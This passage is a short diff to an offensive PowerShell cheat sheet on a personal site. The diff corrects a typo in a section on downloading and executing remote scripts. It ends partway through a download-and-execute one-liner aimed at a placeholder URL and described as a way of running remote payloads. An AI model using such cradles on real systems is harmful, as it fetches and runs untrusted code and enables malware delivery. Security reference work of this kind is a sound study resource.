BenjiTrapp/benjitrapp.github.io/_attacks/2024-01-04-offensive-powershell.md

 ```

 ### Downloading and Executing Scripts from URL
-Downloads and executes a PowerShell script from a specied URL.
+Downloads and executes a PowerShell script from a specific URL.
 Useful for executing remote payloads.

 ```powershell
 $url = 'http://example.com/script.ps1'; Invoke-Expression (New-Object